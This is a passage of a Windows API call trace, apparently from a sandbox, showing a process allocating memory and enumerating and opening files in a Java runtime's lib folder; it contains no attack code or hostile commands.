[0094.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0094.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.551] AreFileApisANSI () returned 1 [0094.551] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist", lpUsedDefaultChar=0x0) returned 49 [0094.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0094.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.551] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0094.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.551] AreFileApisANSI () returned 1 [0094.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0094.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46198 [0094.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46198, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 49 [0094.551] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.552] GetFileType (hFile=0x360) returned 0x1 [0094.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46198 | out: hHeap=0x20000) returned 1 [0094.552] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.552] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.552] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.552] CloseHandle (hObject=0x360) returned 1 [0094.552] AreFileApisANSI () returned 1 [0094.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0094.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x460b8 [0094.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 49 [0094.552] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0094.553] GetFileType (hFile=0x360) returned 0x1 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0094.553] CloseHandle (hObject=0x360) returned 1 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.554] AreFileApisANSI () returned 1 [0094.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0094.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46908 [0094.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist") returned 49 [0094.554] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\classlist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\classlist"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x14983)) returned 1 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0094.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.554] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105e2a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="cmm", cAlternateFileName="")) returned 1 [0094.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0094.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0094.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0094.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0094.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0094.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0094.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0094.555] AreFileApisANSI () returned 1 [0094.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm", lpUsedDefaultChar=0x0) returned 43 [0094.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.555] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0094.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.555] AreFileApisANSI () returned 1 [0094.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0094.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67240 [0094.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67240, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm") returned 43 [0094.555] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.555] GetLastError () returned 0x5 [0094.555] GetLastError () returned 0x5 [0094.555] SetLastError (dwErrCode=0x5) [0094.555] GetLastError () returned 0x5 [0094.555] SetLastError (dwErrCode=0x5) [0094.555] GetLastError () returned 0x5 [0094.555] SetLastError (dwErrCode=0x5) [0094.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67240 | out: hHeap=0x20000) returned 1 [0094.555] AreFileApisANSI () returned 1 [0094.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0094.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x670c0 [0094.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x670c0, cchWideChar=43 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm") returned 43 [0094.556] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.556] GetLastError () returned 0x5 [0094.556] GetLastError () returned 0x5 [0094.556] SetLastError (dwErrCode=0x5) [0094.556] GetLastError () returned 0x5 [0094.556] SetLastError (dwErrCode=0x5) [0094.556] GetLastError () returned 0x5 [0094.556] SetLastError (dwErrCode=0x5) [0094.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x670c0 | out: hHeap=0x20000) returned 1 [0094.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0094.657] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.660] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.661] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.662] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0094.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0094.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0094.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0094.663] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15ac, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="content-types.properties", cAlternateFileName="CONTEN~1.PRO")) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0094.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0094.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0094.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0094.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0094.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0094.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0094.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0094.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0094.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0094.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0094.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0094.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0094.664] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x782d0 [0094.664] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105e2a1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.664] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc824, dwReserved0=0x0, dwReserved1=0x0, cFileName="CIEXYZ.pf", cAlternateFileName="")) returned 1 [0094.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0094.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0094.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46198 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0094.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0094.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0094.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0094.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0094.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0094.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ac50 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0094.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.665] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0094.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.666] AreFileApisANSI () returned 1 [0094.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\CIEXYZ.pf", lpUsedDefaultChar=0x0) returned 53 [0094.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0094.666] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: 